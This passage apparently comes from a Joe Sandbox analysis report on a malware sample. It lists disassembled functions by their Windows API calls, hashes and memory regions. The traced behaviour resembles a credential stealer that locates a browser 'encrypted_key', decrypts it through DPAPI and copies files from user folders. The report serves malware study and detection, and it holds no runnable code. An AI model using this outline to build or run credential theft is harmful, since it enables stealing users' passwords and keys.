                                          • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                          • String ID: @
                                          • API String ID: 1977917189-2766056989
                                          • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                          • Instruction ID: 8ef8838c4dabd9b5ffbf335bed83dde36b03243539e71410ccab88204e78313a
                                          • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                          • Instruction Fuzzy Hash: 60615C30A20348DBCB24EFE4CD96FED7776AF44304F508218E90A9B198DBB46A05CF45
                                          APIs
                                          • strtok_s.MSVCRT ref: 00410DB8
                                          • strtok_s.MSVCRT ref: 00410EFD
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00792F70,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strtok_s$lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 348468850-0
                                          • Opcode ID: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                          • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                          • Opcode Fuzzy Hash: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                          • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                            • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                            • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                          • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                            • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                            • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                            • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                            • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                          • String ID: $"encrypted_key":"$DPAPI
                                          • API String ID: 3731072634-738592651
                                          • Opcode ID: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                          • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                          • Opcode Fuzzy Hash: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                          • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CodeInfoPageValidmemset
                                          • String ID:
                                          • API String ID: 703783727-0
                                          • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                          • Instruction ID: efb6c8353c0cfa549cf753d93e8578fca3eb1080a916517ebfae367529448362
                                          • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                          • Instruction Fuzzy Hash: 3931E871A242929EDB26CFB5CC943B9BFA59F06315F1881BBD881CF19AC778C406C761
                                          APIs
                                            • Part of subcall function 022D9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022D9072
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D51E1
                                          • lstrcat.KERNEL32(?,00421070), ref: 022D51FE
                                          • lstrcat.KERNEL32(?,0064A5F8), ref: 022D5212
                                          • lstrcat.KERNEL32(?,00421074), ref: 022D5224
                                            • Part of subcall function 022D4B77: wsprintfA.USER32 ref: 022D4B93
                                            • Part of subcall function 022D4B77: FindFirstFileA.KERNEL32(?,?), ref: 022D4BAA
                                            • Part of subcall function 022D4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022D4BD8
                                            • Part of subcall function 022D4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022D4BEE
                                            • Part of subcall function 022D4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022D4DE4
                                            • Part of subcall function 022D4B77: FindClose.KERNEL32(000000FF), ref: 022D4DF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                          • String ID: `1y
                                          • API String ID: 2667927680-1477631000
                                          • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                          • Instruction ID: ad14128fbeaaa3fe8c907fcbc40012b576f6b364d9f9a5d47ecb7b00ee3d8b0d
                                          • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                          • Instruction Fuzzy Hash: D721B67AA503087BC714FBE0DC45EE9337AAB55300F404198B68992184DE7596C9CFA2
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                          • wsprintfA.USER32 ref: 00418850
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocProcesslstrcpywsprintf
                                          • String ID: /y$%dx%d
                                          • API String ID: 2716131235-3838359617
                                          • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                          • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                          • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                          • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D809E
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D80A5
                                          • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022D80C5
                                          • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022D80E6
                                          • RegCloseKey.ADVAPI32(?), ref: 022D80F9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                          • Instruction ID: dad999f744f97da386e04010e168c21383957a89a9b3432bcef38ba4ac3a64f3
                                          • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                          • Instruction Fuzzy Hash: 6A116DB5A94209BBD700CFD4DC4AFBBB7B9EB05701F004219F615A7280C7B458018BA2
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                          • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                          • RegOpenKeyExA.ADVAPI32(80000002,007958C8,00000000,00020119,?), ref: 00417E5E
                                          • RegQueryValueExA.ADVAPI32(?,00799DE0,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                          • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3466090806-0
                                          • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                          • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                          • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                          • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D799B
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D79A2
                                          • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022D7920), ref: 022D79C2
                                          • RegQueryValueExA.ADVAPI32(022D7920,00420AAC,00000000,00000000,?,000000FF), ref: 022D79E1
                                          • RegCloseKey.ADVAPI32(022D7920), ref: 022D79EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                          • Instruction ID: e4e33df23d6af173b855dbbfc98c13829bc900105dd33c582b58ee17537167bb
                                          • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                          • Instruction Fuzzy Hash: CE014FB9A80308BFEB10DFE0DC4AFAEB7B9EB48701F104159FA05A7280D67496008F52
                                          APIs
                                          • StrStrA.SHLWAPI(00799898,?,?,?,0041140C,?,00799898,00000000), ref: 0041926C
                                          • lstrcpyn.KERNEL32(0064AB88,00799898,00799898,?,0041140C,?,00799898), ref: 00419290
                                          • lstrlenA.KERNEL32(?,?,0041140C,?,00799898), ref: 004192A7
                                          • wsprintfA.USER32 ref: 004192C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpynlstrlenwsprintf
                                          • String ID: %s%s
                                          • API String ID: 1206339513-3252725368
                                          • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                          • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                          • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                          • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022C151B
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022C1522
                                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022C153E
                                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022C155C
                                          • RegCloseKey.ADVAPI32(?), ref: 022C1566
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                          • Instruction ID: b61b3052f9ad2089977eedf340f3dea51ea8aae8770192815130ad974ae50132
                                          • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                          • Instruction Fuzzy Hash: D10131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F108159FA0597280D6749A018F91
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                          • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                          • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3466090806-0
                                          • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                          • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                          • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                          • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                          APIs
                                          • __getptd.LIBCMT ref: 022DC9B5
                                            • Part of subcall function 022DC206: __getptd_noexit.LIBCMT ref: 022DC209
                                            • Part of subcall function 022DC206: __amsg_exit.LIBCMT ref: 022DC216
                                          • __getptd.LIBCMT ref: 022DC9CC
                                          • __amsg_exit.LIBCMT ref: 022DC9DA
                                          • __lock.LIBCMT ref: 022DC9EA
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 022DC9FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                          • Instruction ID: 29887b56b244f2a0121e73668c9b9826f72253c30165ac38f0eec8a1d4308e7f
                                          • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                          • Instruction Fuzzy Hash: 94F0B432A717119BDB30BBE8990ABAD33A1AF04768F11020BD414A71D8DBA45541DF9E
                                          APIs
                                          • __getptd.LIBCMT ref: 0041C74E
                                            • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                            • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                          • __getptd.LIBCMT ref: 0041C765
                                          • __amsg_exit.LIBCMT ref: 0041C773
                                          • __lock.LIBCMT ref: 0041C783
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                          • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                          • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                          • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                          APIs
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                          • lstrcatA.KERNEL32(?,00799DA0), ref: 00414C08
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                            • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00793010,?,000003E8), ref: 00414A4A
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                            • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                            • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                          • String ID: 00y$UaA
                                          • API String ID: 2104210347-4255973613
                                          • Opcode ID: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                          • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                          • Opcode Fuzzy Hash: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                          • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                          APIs
                                          • GetEnvironmentVariableA.KERNEL32(-y,0064B390,0000FFFF), ref: 022CA324
                                          • LoadLibraryA.KERNEL32(0064A578), ref: 022CA3AD
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAA87: lstrlen.KERNEL32(022C516C,?,?,022C516C,00420DDE), ref: 022DAA92
                                            • Part of subcall function 022DAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022DAAEC
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • SetEnvironmentVariableA.KERNEL32(-y,00000000,00000000,?,004212D8,?,?,0064B390,00420AFE), ref: 022CA399
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                          • String ID: -y
                                          • API String ID: 2929475105-3988916203
                                          • Opcode ID: 6027c5fd171335b18c1cc3c543ab76e1658be5b37c2198500408d77f0a97119a
                                          • Instruction ID: c8b16689c1a53126819a0aa80229d8a29aa640f0fdb186227b619f0f72d35f07
                                          • Opcode Fuzzy Hash: 6027c5fd171335b18c1cc3c543ab76e1658be5b37c2198500408d77f0a97119a
                                          • Instruction Fuzzy Hash: 614160799A0204FFCB14EFE4ED84EAA77BBBB0A304F19122DE505932A4DB745944CF52
                                          APIs
                                          • GetEnvironmentVariableA.KERNEL32(00792DE0,0064B390,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,00410153), ref: 0040A0BD
                                          • LoadLibraryA.KERNEL32(00799E60,?,?,?,?,?,?,?,?,?,?,?,00410153), ref: 0040A146
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00792F70,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
